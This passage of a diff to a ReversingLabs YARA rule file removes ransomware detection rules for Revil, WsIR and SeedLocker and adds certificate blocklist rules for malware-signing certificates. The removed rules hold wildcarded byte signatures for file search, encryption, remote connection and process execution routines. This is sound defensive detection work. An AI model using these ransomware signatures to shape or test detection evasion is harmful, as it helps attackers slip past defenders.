-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files = {
-            50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87
-            ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? F6 47 ?? ?? 0F 85 ?? ??
-            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ??
-            6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
-            ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83
-            FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
-            ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45
-            ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F
-            84 ?? ?? ?? ?? F6 47 ?? ?? 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75
-            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75
-            ?? 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0
-            F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B DB F7 DB 84 DB
-            75 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$decrypt_payload_script = {
-            FF 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF
-            75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
-            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8B C3 BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF 33 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
-            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
-            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D
-            45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and $decrypt_payload_script and ( all of ( $remote_connection_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROSSO INDEX K.K." and pe.signatures [ i ] . serial == "01:00:00:00:00:01:29:7d:ba:69:dd" and 1277713154 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Revil : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Revil ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "67c2f49e-b9dc-5900-a89d-49ba41088ac3"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "aeb10a64-633c-5fc6-87af-360e1a402ad4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Revil.yara#L1-L101"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24a79477eb797d7a7121d1248ebbece833ccd256de55729ff96084135ce8d426"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16546-L16562"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "655ed87ee65f937c7cec95085fe612f8d733e0853c87aa50b4aa1fda9e5f7a5d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Revil"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$search_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 33 C0 57 8B 7D ?? 8B D8 50 56 89 45 ?? 89
-            5D ?? 89 45 ?? 89 45 ?? FF 57 ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 56 50 E8 ??
-            ?? ?? ?? 53 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? E9 ?? ?? ?? ?? 8B 45 ??
-            0B 45 ?? 74 ?? FF 33 56 E8 ?? ?? ?? ?? 8B F3 8B 5B ?? 89 5D ?? FF 36 E8 ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 83 C0 ?? 89 45 ?? 83 D1 ?? 0B C1 89 4D
-            ?? 75 ?? 21 45 ?? 8B 75 ?? 33 C0 40 85 C0 0F 84 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ??
-            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8D 04 46 50 E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 59
-            74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 57 ?? 83 C4 ?? 85
-            C0 74 ?? 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 77 ?? FF 57 ?? 83
-            C4 ?? 01 47 ?? 11 57 ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 50 89 45 ?? 8D 85
-            ?? ?? ?? ?? 53 50 56 FF 57 ?? 83 C4 ?? 85 C0 74 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 53 50
-            56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? 83 3F ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
-            FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 5D
-            ?? 83 3F ?? 0F 84 ?? ?? ?? ?? EB ?? 8B F3 8B 5B ?? FF 36 E8 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 59 59 85 DB 75 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C0 66 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 56 56 56 56 50 FF 15 ?? ?? ?? ?? 8B F8 33 C0 89 7D ?? 85 FF 0F 84 ?? ??
-            ?? ?? 66 89 45 ?? 33 C9 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 56 FF 75 ?? 41 89 75 ??
-            89 75 ?? 89 75 ?? 89 75 ?? 89 4D ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89
-            4D ?? 89 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 33 C0 E9
-            ?? ?? ?? ?? 8B 4D ?? 33 D2 8B 45 ?? 53 56 66 89 14 41 FF 75 ?? FF 75 ?? 57 FF 15 ??
-            ?? ?? ?? 8B D8 89 5D ?? 85 DB 75 ?? 57 EB ?? 8B 45 ?? 66 39 30 75 ?? 6A ?? 59 66 89
-            08 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
-            C0 83 7D ?? ?? B9 ?? ?? ?? ?? 66 89 45 ?? 0F 44 C1 0D ?? ?? ?? ?? 50 56 56 56 FF 75
-            ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FE 50 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 56 FF 75 ?? 8D 85
-            ?? ?? ?? ?? FF 75 ?? FF 75 ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 53 FF 15 ?? ??
-            ?? ?? 85 C0 6A ?? 58 0F 45 F8 85 FF 75 ?? 8B 45 ?? 56 53 89 30 FF 15 ?? ?? ?? ?? 8B
-            7D ?? 85 C0 74 ?? 56 8D 45 ?? 89 75 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 68 ??
-            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 1B C0 23 45 ?? 89 01 3D ?? ?? ?? ?? 75
-            ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 8B F0 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C6 5B 5F 5E 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 51 83 7D ?? ?? 53 56 57 BB ?? ?? ?? ?? 7F ?? 7C ?? 39 5D ?? 73 ?? 8B 5D ??
-            8B 7D ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 59 59 EB ?? E8 ?? ?? ?? ?? 83 F8 ??
-            75 ?? 6A ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85
-            F6 74 ?? 89 9E ?? ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? EB ?? 33 C0 EB ?? E8 ?? ??
-            ?? ?? 8B 55 ?? 8B CA 4A 89 55 ?? 85 C9 74 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 83
-            F8 ?? 74 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 56 E8 ??
-            ?? ?? ?? 8B C6 59 5F 5E 5B 8B E5 5D C3 56 57 E8 ?? ?? ?? ?? 59 33 C0 EB
-        }
-		$enum_resources = {
-            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 33 C0 E9 ?? ?? ?? ?? 83 4D ?? ?? B8 ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B
-            F8 59 85 FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 53 56 8D 45 ?? 50 57 8D 45
-            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 33 DB 39 5D ?? 76 ?? 8D 77 ??
-            83 7E ?? ?? 75 ?? FF 75 ?? FF 36 E8 ?? ?? ?? ?? 59 59 F6 46 ?? ?? 74 ?? 8D 46 ?? 50
-            FF 75 ?? E8 ?? ?? ?? ?? 59 59 43 83 C6 ?? 3B 5D ?? 72 ?? 8B 45 ?? 3D ?? ?? ?? ?? 75
-            ?? 57 E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 5E 1B C0 40 5B 5F 8B E5 5D
-            C3
-        }
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_files ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "7d:ef:22:ef:4c:64:5b:1d:ec:fb:36:b6:d3:53:9d:bf" and 1474416000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Wsir : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WsIR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cb4ab736-9421-5b92-b4a5-c5db0b61725a"
-		date = "2022-08-02"
-		modified = "2022-08-02"
+		id = "87477ad5-fc7e-5407-9c6e-bef3d4d8981d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.WsIR.yara#L1-L73"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c22c01f93945c7721ebfe5e7a09c3bf2b9d0ad95740bc0a76b4e61741f61d82c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16564-L16580"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3b4a55149b3895eeea5f96297d1fc9787eb74e2fcef8170148ef1a2ced334311"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WsIR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53
-            55 8B E9 8D 4C 24 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 8B 41 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 00
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 85 C0 0F 95 C3 E8 ?? ?? ?? ??
-            84 DB 74 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8
-            ?? ?? ?? ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75
-            ?? 8D 4C 24 ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8B B4 24 ?? ??
-            ?? ?? 57 8B 3D ?? ?? ?? ?? BB ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 54 24 ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 45 ?? 8D 54 24 ?? 52 6A ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 4C 24 ?? 89 5C 24 ?? FF D7 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 56 6A ?? 68
-            ?? ?? ?? ?? 51 FF D7 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
-            5E 8B 8C 24 ?? ?? ?? ?? 5D 5B 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
-        }
-		$encrypt_files = {
-            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
-            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
-            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ??
-            E9
-        }
-		$exec_proc = {
-            52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ??
-            ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 85 F6 75 ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8D 74 04 ?? EB ?? 8D 57 ??
-            8D 4C 24 ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 4C 24
-            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 EB ?? C6 06 ?? 68 ?? ?? ??
-            ?? 56 FF D3 8B 44 24 ?? 50 56 FF D3 8D 4C 24 ?? 55 51 FF 15 ?? ?? ?? ?? 8B F0 33 D2
-            83 FE ?? 0F 9F C2 8D 4C 24 ?? 8B F2 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            5D 8B C6 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $exec_proc )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "3e:39:c2:cc:c4:94:43:8b:b8:c2:56:0f" and 1466142876 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Seedlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects SeedLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "efa3dd2e-faf4-5882-aef8-85189e65f0f9"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "66025c6e-5d85-5660-87f1-3094a536bbe2"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.SeedLocker.yara#L1-L91"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a478efcfb03e3eeebe72d9a71629456cf061c3c779fbdde99539854caf8c7c33"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16582-L16598"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "86b06519858dce4b77cb870905297a1fd1c767053fd07c0b0469eb7fc3ba6b32"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "SeedLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
-            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
-            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
